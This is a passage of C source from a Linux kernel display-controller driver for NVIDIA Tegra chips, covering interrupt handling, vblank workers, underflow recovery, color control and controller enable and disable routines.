tegra_dc_writel(dc, ctrl, DC_COM_PM1_CONTROL);
tegra_dc_writel(dc, cfg->duty_cycle, DC_COM_PM1_DUTY_CYCLE);
break;
default:
dev_err(&dc->ndev->dev, "Error: Need which_pwm\n");
break;
}
tegra_dc_writel(dc, cmd_state, DC_CMD_STATE_ACCESS);
tegra_dc_release_dc_out(dc);
tegra_dc_io_end(dc);
mutex_unlock(&dc->lock);
}
EXPORT_SYMBOL(tegra_dc_config_pwm);
void tegra_dc_set_out_pin_polars(struct tegra_dc *dc,
const struct tegra_dc_out_pin *pins,
const unsigned int n_pins)
{
unsigned int i;
int name;
int pol;
u32 pol1, pol3;
u32 set1, unset1;
u32 set3, unset3;
set1 = set3 = unset1 = unset3 = 0;
for (i = 0; i < n_pins; i++) {
name = (pins + i)->name;
pol = (pins + i)->pol;
/* set polarity by name */
switch (name) {
case TEGRA_DC_OUT_PIN_DATA_ENABLE:
if (pol == TEGRA_DC_OUT_PIN_POL_LOW)
set3 |= LSPI_OUTPUT_POLARITY_LOW;
else
unset3 |= LSPI_OUTPUT_POLARITY_LOW;
break;
case TEGRA_DC_OUT_PIN_H_SYNC:
if (pol == TEGRA_DC_OUT_PIN_POL_LOW)
set1 |= LHS_OUTPUT_POLARITY_LOW;
else
unset1 |= LHS_OUTPUT_POLARITY_LOW;
break;
case TEGRA_DC_OUT_PIN_V_SYNC:
if (pol == TEGRA_DC_OUT_PIN_POL_LOW)
set1 |= LVS_OUTPUT_POLARITY_LOW;
else
unset1 |= LVS_OUTPUT_POLARITY_LOW;
break;
case TEGRA_DC_OUT_PIN_PIXEL_CLOCK:
if (pol == TEGRA_DC_OUT_PIN_POL_LOW)
set1 |= LSC0_OUTPUT_POLARITY_LOW;
else
unset1 |= LSC0_OUTPUT_POLARITY_LOW;
break;
default:
printk("Invalid argument in function %s\n",
__FUNCTION__);
break;
}
}
pol1 = DC_COM_PIN_OUTPUT_POLARITY1_INIT_VAL;
pol3 = DC_COM_PIN_OUTPUT_POLARITY3_INIT_VAL;
pol1 |= set1;
pol1 &= ~unset1;
pol3 |= set3;
pol3 &= ~unset3;
tegra_dc_writel(dc, pol1, DC_COM_PIN_OUTPUT_POLARITY1);
tegra_dc_writel(dc, pol3, DC_COM_PIN_OUTPUT_POLARITY3);
}
static struct tegra_dc_mode *tegra_dc_get_override_mode(struct tegra_dc *dc)
{
if (dc->out->type == TEGRA_DC_OUT_RGB ||
dc->out->type == TEGRA_DC_OUT_HDMI ||
dc->out->type == TEGRA_DC_OUT_DSI)
return override_disp_mode[dc->out->type].pclk ?
&override_disp_mode[dc->out->type] : NULL;
else
return NULL;
}
static void tegra_dc_set_out(struct tegra_dc *dc, struct tegra_dc_out *out)
{
struct tegra_dc_mode *mode;
dc->out = out;
mode = tegra_dc_get_override_mode(dc);
if (mode)
tegra_dc_set_mode(dc, mode);
else if (out->n_modes > 0)
tegra_dc_set_mode(dc, &dc->out->modes[0]);
switch (out->type) {
case TEGRA_DC_OUT_RGB:
dc->out_ops = &tegra_dc_rgb_ops;
break;
case TEGRA_DC_OUT_HDMI:
dc->out_ops = &tegra_dc_hdmi_ops;
break;
case TEGRA_DC_OUT_DSI:
dc->out_ops = &tegra_dc_dsi_ops;
break;
default:
dc->out_ops = NULL;
break;
}
if (dc->out_ops && dc->out_ops->init)
dc->out_ops->init(dc);
}
/* returns on error: -EINVAL
* on success: TEGRA_DC_OUT_RGB, TEGRA_DC_OUT_HDMI, or TEGRA_DC_OUT_DSI. */
int tegra_dc_get_out(const struct tegra_dc *dc)
{
if (dc && dc->out)
return dc->out->type;
return -EINVAL;
}
unsigned tegra_dc_get_out_height(const struct tegra_dc *dc)
{
if (dc->out)
return dc->out->height;
else
return 0;
}
EXPORT_SYMBOL(tegra_dc_get_out_height);
unsigned tegra_dc_get_out_width(const struct tegra_dc *dc)
{
if (dc->out)
return dc->out->width;
else
return 0;
}
EXPORT_SYMBOL(tegra_dc_get_out_width);
unsigned tegra_dc_get_out_max_pixclock(const struct tegra_dc *dc)
{
if (dc->out && dc->out->max_pixclock)
return dc->out->max_pixclock;
else
return 0;
}
EXPORT_SYMBOL(tegra_dc_get_out_max_pixclock);
void tegra_dc_enable_crc(struct tegra_dc *dc)
{
u32 val;
mutex_lock(&dc->lock);
tegra_dc_io_start(dc);
tegra_dc_hold_dc_out(dc);
val = CRC_ALWAYS_ENABLE | CRC_INPUT_DATA_ACTIVE_DATA |
CRC_ENABLE_ENABLE;
tegra_dc_writel(dc, val, DC_COM_CRC_CONTROL);
tegra_dc_writel(dc, GENERAL_UPDATE, DC_CMD_STATE_CONTROL);
tegra_dc_writel(dc, GENERAL_ACT_REQ, DC_CMD_STATE_CONTROL);
tegra_dc_release_dc_out(dc);
tegra_dc_io_end(dc);
mutex_unlock(&dc->lock);
}
void tegra_dc_disable_crc(struct tegra_dc *dc)
{
mutex_lock(&dc->lock);
tegra_dc_io_start(dc);
tegra_dc_hold_dc_out(dc);
tegra_dc_writel(dc, 0x0, DC_COM_CRC_CONTROL);
tegra_dc_writel(dc, GENERAL_UPDATE, DC_CMD_STATE_CONTROL);
tegra_dc_writel(dc, GENERAL_ACT_REQ, DC_CMD_STATE_CONTROL);
tegra_dc_release_dc_out(dc);
tegra_dc_io_end(dc);
mutex_unlock(&dc->lock);
}
u32 tegra_dc_read_checksum_latched(struct tegra_dc *dc)
{
int crc = 0;
if (!dc) {
pr_err("Failed to get dc: NULL parameter.\n");
goto crc_error;
}
#ifndef CONFIG_TEGRA_SIMULATION_PLATFORM
/* TODO: Replace mdelay with code to sync VBlANK, since
* DC_COM_CRC_CHECKSUM_LATCHED is available after VBLANK */
mdelay(TEGRA_CRC_LATCHED_DELAY);
#endif
mutex_lock(&dc->lock);
tegra_dc_io_start(dc);
tegra_dc_hold_dc_out(dc);
crc = tegra_dc_readl(dc, DC_COM_CRC_CHECKSUM_LATCHED);
tegra_dc_release_dc_out(dc);
tegra_dc_io_end(dc);
mutex_unlock(&dc->lock);
crc_error:
return crc;
}
static bool tegra_dc_windows_are_dirty(struct tegra_dc *dc)
{
#ifndef CONFIG_TEGRA_SIMULATION_PLATFORM
u32 val;
val = tegra_dc_readl(dc, DC_CMD_STATE_CONTROL);
if (val & (WIN_A_ACT_REQ | WIN_B_ACT_REQ | WIN_C_ACT_REQ))
return true;
#endif
return false;
}
static inline void enable_dc_irq(const struct tegra_dc *dc)
{
#ifndef CONFIG_TEGRA_FPGA_PLATFORM
enable_irq(dc->irq);
#else
/* Always disable DC interrupts on FPGA. */
disable_irq(dc->irq);
#endif
}
void tegra_dc_get_fbvblank(struct tegra_dc *dc, struct fb_vblank *vblank)
{
if (dc->out->flags & TEGRA_DC_OUT_ONE_SHOT_MODE)
vblank->flags = FB_VBLANK_HAVE_VSYNC;
}
int tegra_dc_wait_for_vsync(struct tegra_dc *dc)
{
int ret = -ENOTTY;
if (!(dc->out->flags & TEGRA_DC_OUT_ONE_SHOT_MODE) || !dc->enabled)
return ret;
/*
* Logic is as follows
* a) Indicate we need a vblank.
* b) Wait for completion to be signalled from isr.
* c) Initialize completion for next iteration.
*/
tegra_dc_hold_dc_out(dc);
dc->out->user_needs_vblank = true;
ret = wait_for_completion_interruptible(&dc->out->user_vblank_comp);
init_completion(&dc->out->user_vblank_comp);
tegra_dc_release_dc_out(dc);
return ret;
}
static void tegra_dc_prism_update_backlight(struct tegra_dc *dc)
{
/* Do the actual brightness update outside of the mutex dc->lock */
if (dc->out->sd_settings && !dc->out->sd_settings->bl_device &&
dc->out->sd_settings->bl_device_name) {
char *bl_device_name =
dc->out->sd_settings->bl_device_name;
dc->out->sd_settings->bl_device =
get_backlight_device_by_name(bl_device_name);
}
if (dc->out->sd_settings && dc->out->sd_settings->bl_device) {
struct backlight_device *bl = dc->out->sd_settings->bl_device;
backlight_update_status(bl);
}
}
static void tegra_dc_vblank(struct work_struct *work)
{
struct tegra_dc *dc = container_of(work, struct tegra_dc, vblank_work);
bool nvsd_updated = false;
mutex_lock(&dc->lock);
if (!dc->enabled) {
mutex_unlock(&dc->lock);
return;
}
tegra_dc_io_start(dc);
tegra_dc_hold_dc_out(dc);
/* use the new frame's bandwidth setting instead of max(current, new),
* skip this if we're using tegra_dc_one_shot_worker() */
if (!(dc->out->flags & TEGRA_DC_OUT_ONE_SHOT_MODE))
tegra_dc_program_bandwidth(dc, true);
/* Clear the V_BLANK_FLIP bit of vblank ref-count if update is clean. */
if (!tegra_dc_windows_are_dirty(dc))
clear_bit(V_BLANK_FLIP, &dc->vblank_ref_count);
/* Update the SD brightness */
if (dc->out->sd_settings && !dc->out->sd_settings->use_vpulse2) {
nvsd_updated = nvsd_update_brightness(dc);
/* Ref-count vblank if nvsd is on-going. Otherwise, clean the
* V_BLANK_NVSD bit of vblank ref-count. */
if (nvsd_updated) {
set_bit(V_BLANK_NVSD, &dc->vblank_ref_count);
tegra_dc_unmask_interrupt(dc, V_BLANK_INT);
} else {
clear_bit(V_BLANK_NVSD, &dc->vblank_ref_count);
}
}
/* Mask vblank interrupt if ref-count is zero. */
if (!dc->vblank_ref_count)
tegra_dc_mask_interrupt(dc, V_BLANK_INT);
tegra_dc_release_dc_out(dc);
tegra_dc_io_end(dc);
mutex_unlock(&dc->lock);
/* Do the actual brightness update outside of the mutex dc->lock */
if (nvsd_updated)
tegra_dc_prism_update_backlight(dc);
}
static void tegra_dc_one_shot_worker(struct work_struct *work)
{
struct tegra_dc *dc = container_of(
to_delayed_work(work), struct tegra_dc, one_shot_work);
mutex_lock(&dc->lock);
/* memory client has gone idle */
tegra_dc_clear_bandwidth(dc);
if (dc->out_ops->idle) {
tegra_dc_io_start(dc);
dc->out_ops->idle(dc);
tegra_dc_io_end(dc);
}
mutex_unlock(&dc->lock);
}
/* return an arbitrarily large number if count overflow occurs.
* make it a nice base-10 number to show up in stats output */
static u64 tegra_dc_underflow_count(struct tegra_dc *dc, unsigned reg)
{
unsigned count = tegra_dc_readl(dc, reg);
tegra_dc_writel(dc, 0, reg);
return ((count & 0x80000000) == 0) ? count : 10000000000ll;
}
static void tegra_dc_underflow_handler(struct tegra_dc *dc)
{
int i;
dc->stats.underflows++;
if (dc->underflow_mask & WIN_A_UF_INT)
dc->stats.underflows_a += tegra_dc_underflow_count(dc,
DC_WINBUF_AD_UFLOW_STATUS);
if (dc->underflow_mask & WIN_B_UF_INT)
dc->stats.underflows_b += tegra_dc_underflow_count(dc,
DC_WINBUF_BD_UFLOW_STATUS);
if (dc->underflow_mask & WIN_C_UF_INT)
dc->stats.underflows_c += tegra_dc_underflow_count(dc,
DC_WINBUF_CD_UFLOW_STATUS);
/* Check for any underflow reset conditions */
for (i = 0; i < DC_N_WINDOWS; i++) {
if (dc->underflow_mask & (WIN_A_UF_INT << i)) {
dc->windows[i].underflows++;
#ifdef CONFIG_ARCH_TEGRA_2x_SOC
if (dc->windows[i].underflows > 4) {
schedule_work(&dc->reset_work);
/* reset counter */
dc->windows[i].underflows = 0;
trace_display_reset(dc);
}
#endif
#ifdef CONFIG_ARCH_TEGRA_3x_SOC
if (dc->windows[i].underflows > 4) {
trace_display_reset(dc);
tegra_dc_writel(dc, UF_LINE_FLUSH,
DC_DISP_DISP_MISC_CONTROL);
tegra_dc_writel(dc, GENERAL_UPDATE,
DC_CMD_STATE_CONTROL);
tegra_dc_writel(dc, GENERAL_ACT_REQ,
DC_CMD_STATE_CONTROL);
tegra_dc_writel(dc, 0,
DC_DISP_DISP_MISC_CONTROL);
tegra_dc_writel(dc, GENERAL_UPDATE,
DC_CMD_STATE_CONTROL);
tegra_dc_writel(dc, GENERAL_ACT_REQ,
DC_CMD_STATE_CONTROL);
}
#endif
} else {
dc->windows[i].underflows = 0;
}
}
/* Clear the underflow mask now that we've checked it. */
tegra_dc_writel(dc, dc->underflow_mask, DC_CMD_INT_STATUS);
dc->underflow_mask = 0;
tegra_dc_unmask_interrupt(dc, ALL_UF_INT);
trace_underflow(dc);
}
#if !defined(CONFIG_ARCH_TEGRA_2x_SOC) && !defined(CONFIG_ARCH_TEGRA_3x_SOC)
static void tegra_dc_vpulse2(struct work_struct *work)
{
struct tegra_dc *dc = container_of(work, struct tegra_dc, vpulse2_work);
bool nvsd_updated = false;
mutex_lock(&dc->lock);
if (!dc->enabled) {
mutex_unlock(&dc->lock);
return;
}
tegra_dc_io_start(dc);
tegra_dc_hold_dc_out(dc);
/* Clear the V_PULSE2_FLIP if no update */
if (!tegra_dc_windows_are_dirty(dc))
clear_bit(V_PULSE2_FLIP, &dc->vpulse2_ref_count);
/* Update the SD brightness */
if (dc->out->sd_settings && dc->out->sd_settings->use_vpulse2) {
nvsd_updated = nvsd_update_brightness(dc);
if (nvsd_updated) {
set_bit(V_PULSE2_NVSD, &dc->vpulse2_ref_count);
tegra_dc_unmask_interrupt(dc, V_PULSE2_INT);
} else {
clear_bit(V_PULSE2_NVSD, &dc->vpulse2_ref_count);
}
}
/* Mask vpulse2 interrupt if ref-count is zero. */
if (!dc->vpulse2_ref_count)
tegra_dc_mask_interrupt(dc, V_PULSE2_INT);
tegra_dc_release_dc_out(dc);
tegra_dc_io_end(dc);
mutex_unlock(&dc->lock);
/* Do the actual brightness update outside of the mutex dc->lock */
if (nvsd_updated)
tegra_dc_prism_update_backlight(dc);
}
#endif
#ifndef CONFIG_TEGRA_FPGA_PLATFORM
static void tegra_dc_one_shot_irq(struct tegra_dc *dc, unsigned long status)
{
/* pending user vblank, so wakeup */
if ((status & (V_BLANK_INT | MSF_INT)) &&
(dc->out->user_needs_vblank)) {
dc->out->user_needs_vblank = false;
complete(&dc->out->user_vblank_comp);
}
if (status & V_BLANK_INT) {
/* Sync up windows. */
tegra_dc_trigger_windows(dc);
/* Schedule any additional bottom-half vblank actvities. */
queue_work(system_freezable_wq, &dc->vblank_work);
}
if (status & FRAME_END_INT) {
/* Mark the frame_end as complete. */
if (!completion_done(&dc->frame_end_complete))
complete(&dc->frame_end_complete);
}
#if !defined(CONFIG_ARCH_TEGRA_2x_SOC) && !defined(CONFIG_ARCH_TEGRA_3x_SOC)
if (status & V_PULSE2_INT)
queue_work(system_freezable_wq, &dc->vpulse2_work);
#endif
}
static void tegra_dc_continuous_irq(struct tegra_dc *dc, unsigned long status)
{
/* Schedule any additional bottom-half vblank actvities. */
if (status & V_BLANK_INT)
queue_work(system_freezable_wq, &dc->vblank_work);
if (status & FRAME_END_INT) {
struct timespec tm = CURRENT_TIME;
dc->frame_end_timestamp = timespec_to_ns(&tm);
wake_up(&dc->timestamp_wq);
/* Mark the frame_end as complete. */
if (!completion_done(&dc->frame_end_complete))
complete(&dc->frame_end_complete);
tegra_dc_trigger_windows(dc);
}
#if !defined(CONFIG_ARCH_TEGRA_2x_SOC) && !defined(CONFIG_ARCH_TEGRA_3x_SOC)
if (status & V_PULSE2_INT)
queue_work(system_freezable_wq, &dc->vpulse2_work);
#endif
}
/* XXX: Not sure if we limit look ahead to 1 frame */
bool tegra_dc_is_within_n_vsync(struct tegra_dc *dc, s64 ts)
{
BUG_ON(!dc->frametime_ns);
return ((ts - dc->frame_end_timestamp) < dc->frametime_ns);
}
bool tegra_dc_does_vsync_separate(struct tegra_dc *dc, s64 new_ts, s64 old_ts)
{
BUG_ON(!dc->frametime_ns);
return (((new_ts - old_ts) > dc->frametime_ns)
|| (div_s64((new_ts - dc->frame_end_timestamp), dc->frametime_ns)
!= div_s64((old_ts - dc->frame_end_timestamp),
dc->frametime_ns)));
}
#endif
static irqreturn_t tegra_dc_irq(int irq, void *ptr)
{
#ifndef CONFIG_TEGRA_FPGA_PLATFORM
struct tegra_dc *dc = ptr;
unsigned long status;
unsigned long underflow_mask;
u32 val;
int need_disable = 0;
mutex_lock(&dc->lock);
if (!dc->enabled || !tegra_dc_is_powered(dc)) {
mutex_unlock(&dc->lock);
return IRQ_HANDLED;
}
clk_prepare_enable(dc->clk);
tegra_dc_io_start(dc);
tegra_dc_hold_dc_out(dc);
if (!nvhost_module_powered_ext(dc->ndev)) {
WARN(1, "IRQ when DC not powered!\n");
status = tegra_dc_readl(dc, DC_CMD_INT_STATUS);
tegra_dc_writel(dc, status, DC_CMD_INT_STATUS);
tegra_dc_release_dc_out(dc);
tegra_dc_io_end(dc);
clk_disable_unprepare(dc->clk);
mutex_unlock(&dc->lock);
return IRQ_HANDLED;
}
/* clear all status flags except underflow, save those for the worker */
status = tegra_dc_readl(dc, DC_CMD_INT_STATUS);
tegra_dc_writel(dc, status & ~ALL_UF_INT, DC_CMD_INT_STATUS);
val = tegra_dc_readl(dc, DC_CMD_INT_MASK);
tegra_dc_writel(dc, val & ~ALL_UF_INT, DC_CMD_INT_MASK);
/*
* Overlays can get thier internal state corrupted during and underflow
* condition. The only way to fix this state is to reset the DC.
* if we get 4 consecutive frames with underflows, assume we're
* hosed and reset.
*/
underflow_mask = status & ALL_UF_INT;
/* Check underflow */
if (underflow_mask) {
dc->underflow_mask |= underflow_mask;
schedule_delayed_work(&dc->underflow_work,
msecs_to_jiffies(1));
}
if (dc->out->flags & TEGRA_DC_OUT_ONE_SHOT_MODE)
tegra_dc_one_shot_irq(dc, status);
else
tegra_dc_continuous_irq(dc, status);
/* update video mode if it has changed since the last frame */
if (status & (FRAME_END_INT | V_BLANK_INT))
if (tegra_dc_update_mode(dc))
need_disable = 1; /* force display off on error */
tegra_dc_release_dc_out(dc);
tegra_dc_io_end(dc);
clk_disable_unprepare(dc->clk);
mutex_unlock(&dc->lock);
if (need_disable)
tegra_dc_disable(dc);
return IRQ_HANDLED;
#else /* CONFIG_TEGRA_FPGA_PLATFORM */
return IRQ_NONE;
#endif /* !CONFIG_TEGRA_FPGA_PLATFORM */
}
void tegra_dc_set_color_control(struct tegra_dc *dc)
{
u32 color_control;
switch (dc->out->depth) {
case 3:
color_control = BASE_COLOR_SIZE111;
break;
case 6:
color_control = BASE_COLOR_SIZE222;
break;
case 8:
color_control = BASE_COLOR_SIZE332;
break;
case 9:
color_control = BASE_COLOR_SIZE333;
break;
case 12:
color_control = BASE_COLOR_SIZE444;
break;
case 15:
color_control = BASE_COLOR_SIZE555;
break;
case 16:
color_control = BASE_COLOR_SIZE565;
break;
case 18:
color_control = BASE_COLOR_SIZE666;
break;
default:
color_control = BASE_COLOR_SIZE888;
break;
}
switch (dc->out->dither) {
case TEGRA_DC_DISABLE_DITHER:
color_control |= DITHER_CONTROL_DISABLE;
break;
case TEGRA_DC_ORDERED_DITHER:
color_control |= DITHER_CONTROL_ORDERED;
break;
case TEGRA_DC_ERRDIFF_DITHER:
/* The line buffer for error-diffusion dither is limited
* to 1280 pixels per line. This limits the maximum
* horizontal active area size to 1280 pixels when error
* diffusion is enabled.
*/
BUG_ON(dc->mode.h_active > 1280);
color_control |= DITHER_CONTROL_ERRDIFF;
break;
}
#ifdef CONFIG_TEGRA_DC_CMU
if (dc->pdata->flags & TEGRA_DC_FLAG_CMU_ENABLE)
color_control |= CMU_ENABLE;
#endif
tegra_dc_writel(dc, color_control, DC_DISP_DISP_COLOR_CONTROL);
}
static u32 get_syncpt(struct tegra_dc *dc, int idx)
{
if (idx >= 0 && idx < ARRAY_SIZE(dc->win_syncpt))
return dc->win_syncpt[idx];
BUG();
}
static void tegra_dc_init_vpulse2_int(struct tegra_dc *dc)
{
#if !defined(CONFIG_ARCH_TEGRA_2x_SOC) && !defined(CONFIG_ARCH_TEGRA_3x_SOC)
u32 start, end;
unsigned long val;
val = V_PULSE2_H_POSITION(0) | V_PULSE2_LAST(0x1);
tegra_dc_writel(dc, val, DC_DISP_V_PULSE2_CONTROL);
start = dc->mode.v_ref_to_sync + dc->mode.v_sync_width +
dc->mode.v_back_porch + dc->mode.v_active;
end = start + 1;
val = V_PULSE2_START_A(start) + V_PULSE2_END_A(end);
tegra_dc_writel(dc, val, DC_DISP_V_PULSE2_POSITION_A);
val = tegra_dc_readl(dc, DC_CMD_INT_ENABLE);
val |= V_PULSE2_INT;
tegra_dc_writel(dc, val , DC_CMD_INT_ENABLE);
tegra_dc_mask_interrupt(dc, V_PULSE2_INT);
tegra_dc_writel(dc, V_PULSE_2_ENABLE, DC_DISP_DISP_SIGNAL_OPTIONS0);
#endif
}
static int tegra_dc_init(struct tegra_dc *dc)
{
int i;
int int_enable;
#if CONFIG_ESD_READ_TE
static int initflag_ext = 0;
#endif
tegra_dc_io_start(dc);
tegra_dc_writel(dc, 0x00000100, DC_CMD_GENERAL_INCR_SYNCPT_CNTRL);
if (dc->ndev->id == 0) {
tegra_mc_set_priority(TEGRA_MC_CLIENT_DISPLAY0A,
TEGRA_MC_PRIO_MED);
tegra_mc_set_priority(TEGRA_MC_CLIENT_DISPLAY0B,
TEGRA_MC_PRIO_MED);
tegra_mc_set_priority(TEGRA_MC_CLIENT_DISPLAY0C,
TEGRA_MC_PRIO_MED);
#if defined(CONFIG_ARCH_TEGRA_2x_SOC) || defined(CONFIG_ARCH_TEGRA_3x_SOC)
/* only present on Tegra2 and 3 */
tegra_mc_set_priority(TEGRA_MC_CLIENT_DISPLAY1B,
TEGRA_MC_PRIO_MED);
#endif
tegra_mc_set_priority(TEGRA_MC_CLIENT_DISPLAYHC,
TEGRA_MC_PRIO_HIGH);
} else if (dc->ndev->id == 1) {
tegra_mc_set_priority(TEGRA_MC_CLIENT_DISPLAY0AB,
TEGRA_MC_PRIO_MED);
tegra_mc_set_priority(TEGRA_MC_CLIENT_DISPLAY0BB,
TEGRA_MC_PRIO_MED);
tegra_mc_set_priority(TEGRA_MC_CLIENT_DISPLAY0CB,
TEGRA_MC_PRIO_MED);
#if defined(CONFIG_ARCH_TEGRA_2x_SOC) || defined(CONFIG_ARCH_TEGRA_3x_SOC)
/* only present on Tegra2 and 3 */
tegra_mc_set_priority(TEGRA_MC_CLIENT_DISPLAY1BB,
TEGRA_MC_PRIO_MED);
#endif
tegra_mc_set_priority(TEGRA_MC_CLIENT_DISPLAYHCB,
TEGRA_MC_PRIO_HIGH);
}
tegra_dc_writel(dc, 0x00000100 | dc->vblank_syncpt,
DC_CMD_CONT_SYNCPT_VSYNC);
tegra_dc_writel(dc, 0x00004700, DC_CMD_INT_TYPE);
tegra_dc_writel(dc, 0x0001c700, DC_CMD_INT_POLARITY);
tegra_dc_writel(dc, 0x00202020, DC_DISP_MEM_HIGH_PRIORITY);
tegra_dc_writel(dc, 0x00010101, DC_DISP_MEM_HIGH_PRIORITY_TIMER);
#ifdef CONFIG_ARCH_TEGRA_3x_SOC
tegra_dc_writel(dc, 0x00000000, DC_DISP_DISP_MISC_CONTROL);
#endif
/* enable interrupts for vblank, frame_end and underflows */
int_enable = (FRAME_END_INT | V_BLANK_INT | ALL_UF_INT);
/* for panels with one-shot mode enable tearing effect interrupt */
if (dc->out->flags & TEGRA_DC_OUT_ONE_SHOT_MODE)
int_enable |= MSF_INT;
tegra_dc_writel(dc, int_enable, DC_CMD_INT_ENABLE);
tegra_dc_writel(dc, ALL_UF_INT, DC_CMD_INT_MASK);
tegra_dc_init_vpulse2_int(dc);
tegra_dc_writel(dc, 0x00000000, DC_DISP_BORDER_COLOR);
#ifdef CONFIG_TEGRA_DC_CMU
if (dc->pdata->cmu)
_tegra_dc_update_cmu(dc, dc->pdata->cmu);
else
_tegra_dc_update_cmu(dc, &default_cmu);
#endif
#if CONFIG_ESD_READ_TE
if(initflag_ext == 0)
{
g_dc = dc;
initflag_ext = 1;
}
#endif
tegra_dc_set_color_control(dc);
for (i = 0; i < DC_N_WINDOWS; i++) {
struct tegra_dc_win *win = &dc->windows[i];
tegra_dc_writel(dc, WINDOW_A_SELECT << i,
DC_CMD_DISPLAY_WINDOW_HEADER);
tegra_dc_set_csc(dc, &win->csc);
tegra_dc_set_lut(dc, win);
tegra_dc_set_scaling_filter(dc);
}
for (i = 0; i < dc->n_windows; i++) {
u32 syncpt = get_syncpt(dc, i);
dc->syncpt[i].id = syncpt;
dc->syncpt[i].min = dc->syncpt[i].max =
nvhost_syncpt_read_ext(dc->ndev, syncpt);
}
trace_display_mode(dc, &dc->mode);
if (dc->mode.pclk) {
if (tegra_dc_program_mode(dc, &dc->mode)) {
tegra_dc_io_end(dc);
return -EINVAL;
}
}
/* Initialize SD AFTER the modeset.
nvsd_init handles the sd_settings = NULL case. */
nvsd_init(dc, dc->out->sd_settings);
tegra_dc_io_end(dc);
return 0;
}
static bool _tegra_dc_controller_enable(struct tegra_dc *dc)
{
int failed_init = 0;
tegra_dc_unpowergate_locked(dc);
if (dc->out->enable)
dc->out->enable(&dc->ndev->dev);
tegra_dc_setup_clk(dc, dc->clk);
tegra_dc_clk_enable(dc);
tegra_dc_io_start(dc);
tegra_dc_power_on(dc);
/* do not accept interrupts during initialization */
tegra_dc_writel(dc, 0, DC_CMD_INT_MASK);
enable_dc_irq(dc);
failed_init = tegra_dc_init(dc);
if (failed_init) {
tegra_dc_writel(dc, 0, DC_CMD_INT_MASK);
disable_irq_nosync(dc->irq);
tegra_dc_clear_bandwidth(dc);
tegra_dc_clk_disable(dc);
if (dc->out && dc->out->disable)
dc->out->disable();
tegra_dc_io_end(dc);
return false;
}
if (dc->out_ops && dc->out_ops->enable)
dc->out_ops->enable(dc);
/* force a full blending update */
dc->blend.z[0] = -1;
tegra_dc_ext_enable(dc->ext);
trace_display_enable(dc);
tegra_dc_writel(dc, GENERAL_UPDATE, DC_CMD_STATE_CONTROL);
tegra_dc_writel(dc, GENERAL_ACT_REQ, DC_CMD_STATE_CONTROL);
if (dc->out->postpoweron)
dc->out->postpoweron();
tegra_log_resume_time();
tegra_dc_io_end(dc);
return true;
}
#ifdef CONFIG_ARCH_TEGRA_2x_SOC
static bool _tegra_dc_controller_reset_enable(struct tegra_dc *dc)
{
bool ret = true;
if (dc->out->enable)
dc->out->enable(&dc->ndev->dev);
tegra_dc_setup_clk(dc, dc->clk);
tegra_dc_clk_enable(dc);
if (dc->ndev->id == 0 && tegra_dcs[1] != NULL) {
mutex_lock(&tegra_dcs[1]->lock);
disable_irq_nosync(tegra_dcs[1]->irq);
} else if (dc->ndev->id == 1 && tegra_dcs[0] != NULL) {
mutex_lock(&tegra_dcs[0]->lock);
disable_irq_nosync(tegra_dcs[0]->irq);
}
msleep(5);
tegra_periph_reset_assert(dc->clk);
msleep(2);
#ifdef CONFIG_TEGRA_SILICON_PLATFORM
tegra_periph_reset_deassert(dc->clk);
msleep(1);
#endif
if (dc->ndev->id == 0 && tegra_dcs[1] != NULL) {
enable_dc_irq(tegra_dcs[1]);
mutex_unlock(&tegra_dcs[1]->lock);
} else if (dc->ndev->id == 1 && tegra_dcs[0] != NULL) {
enable_dc_irq(tegra_dcs[0]);
mutex_unlock(&tegra_dcs[0]->lock);
}
enable_dc_irq(dc);
if (tegra_dc_init(dc)) {
dev_err(&dc->ndev->dev, "cannot initialize\n");
ret = false;
}
if (dc->out_ops && dc->out_ops->enable)
dc->out_ops->enable(dc);
if (dc->out->postpoweron)
dc->out->postpoweron();
/* force a full blending update */
dc->blend.z[0] = -1;
tegra_dc_ext_enable(dc->ext);
if (!ret) {
dev_err(&dc->ndev->dev, "initialization failed,disabling");
_tegra_dc_controller_disable(dc);
}
trace_display_reset(dc);
return ret;
}
#endif
static int _tegra_dc_set_default_videomode(struct tegra_dc *dc)
{
if (dc->mode.pclk == 0) {
switch (dc->out->type) {
case TEGRA_DC_OUT_HDMI:
/* DC enable called but no videomode is loaded.
Check if HDMI is connected, then set fallback mdoe */
if (tegra_dc_hpd(dc)) {
return tegra_dc_set_fb_mode(dc,
&tegra_dc_hdmi_fallback_mode, 0);
} else
return false;
break;
/* Do nothing for other outputs for now */
case TEGRA_DC_OUT_RGB:
case TEGRA_DC_OUT_DSI:
default:
return false;
}
}
return false;
}
int tegra_dc_set_default_videomode(struct tegra_dc *dc)
{
return _tegra_dc_set_default_videomode(dc);
}
static bool _tegra_dc_enable(struct tegra_dc *dc)
{
if (dc->mode.pclk == 0)
return false;
if (!dc->out)
return false;
if (dc->enabled)
return true;
if (!_tegra_dc_controller_enable(dc))
return false;
return true;
}
void tegra_dc_enable(struct tegra_dc *dc)
{
mutex_lock(&dc->lock);
if (!dc->enabled)
dc->enabled = _tegra_dc_enable(dc);
mutex_unlock(&dc->lock);
trace_display_mode(dc, &dc->mode);
}
static void _tegra_dc_controller_disable(struct tegra_dc *dc)
{
unsigned i;
tegra_dc_hold_dc_out(dc);
if (dc->out && dc->out->prepoweroff)
dc->out->prepoweroff();
if (dc->out_ops && dc->out_ops->disable)
dc->out_ops->disable(dc);
tegra_dc_writel(dc, 0, DC_CMD_INT_MASK);
disable_irq_nosync(dc->irq);
tegra_dc_clear_bandwidth(dc);
if (dc->out && dc->out->disable)
dc->out->disable();
for (i = 0; i < dc->n_windows; i++) {
struct tegra_dc_win *w = &dc->windows[i];
/* reset window bandwidth */
w->bandwidth = 0;
w->new_bandwidth = 0;
/* disable windows */
w->flags &= ~TEGRA_WIN_FLAG_ENABLED;
/* flush any pending syncpt waits */
while (dc->syncpt[i].min < dc->syncpt[i].max) {
trace_display_syncpt_flush(dc, dc->syncpt[i].id,
dc->syncpt[i].min, dc->syncpt[i].max);
dc->syncpt[i].min++;
nvhost_syncpt_cpu_incr_ext(dc->ndev, dc->syncpt[i].id);
}
}
trace_display_disable(dc);
tegra_dc_clk_disable(dc);
tegra_dc_release_dc_out(dc);
}
void tegra_dc_stats_enable(struct tegra_dc *dc, bool enable)
{
#if 0 /* underflow interrupt is already enabled by dc reset worker */
u32 val;
if (dc->enabled) {
val = tegra_dc_readl(dc, DC_CMD_INT_ENABLE);
if (enable)
val |= (WIN_A_UF_INT | WIN_B_UF_INT | WIN_C_UF_INT);
else
val &= ~(WIN_A_UF_INT | WIN_B_UF_INT | WIN_C_UF_INT);
